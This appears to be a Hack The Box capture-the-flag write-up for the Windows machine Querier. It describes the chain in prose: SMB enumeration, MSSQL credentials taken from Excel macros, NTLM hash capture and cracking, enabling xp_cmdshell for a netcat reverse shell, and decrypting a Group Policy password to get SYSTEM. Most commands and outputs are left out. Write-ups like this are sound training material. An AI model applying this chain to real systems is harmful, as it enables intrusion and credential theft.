# Hack The Box - Querier

## Quick Summary

Hey guys today Querier retired and here’s my write-up about it. It was a great windows machine covering some interesting stuff and I enjoyed it.I wrote two posts for this machine, first one solving it with kali and the other one solving it with commando vm, you can find the second post here. It’s a Windows box and its ip is 10.10.10.125, I added it to /etc/hosts as querier.htb. Let’s jump right in!

## Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC querier.htb

We got smb and mssql server on port 1433. Let’s check smb.

## Smb

We need to list the shares first. I used smbclient :

Obviously if there’s an anonymously accessible share it will be Reports, Let’s see what’s in there :

Only an Excel file.

## MSSQL Credentials from Report.xlsm

I checked the contents of the excel file by just viewing it as it will be opened with the archive manager :

in xl I found vbaProject.bin so I used olevba from oletools to see if I can get anything :

Great, we got connection credentials for the mssql server :

## MSSQL

I used mssqlclient.py from impacket to connect to the server. First attempt failed :

I added the windows authentication option (-windows-auth) and it worked :

Unfortunately … permission denied for xp_cmdshell :

I ran responder (responder -I tun0) and used xp_dirtree to see what hashes can I catch :

And we got the NTLMv2 hash for mssql-svc.
I used john and rockyou to crack the hash :

Now it’s time to enable xp_cmdshell and get a reverse shell.

We have RCE. I ran a python server to host nc.exe then I used Invoke-WebRequest to download it :

Then I got a reverse shell :

We owned user !

## GPP, Privilege Escalation, Root Flag

One of the things to check when enumerating Windows machines is group policy passwords which happened to be the privilege escalation vector here. I checked group policy passwords and found Administrator’s password :

Groups.xml :

We still need to decrypt the password which can be easily done using gpp-decrypt :

Password is MyUnclesAreMarioAndLuigi!!1!. We can use it with psexec.py from impacket and get a shell as system :

And we owned root !
That’s it , Feedback is appreciated !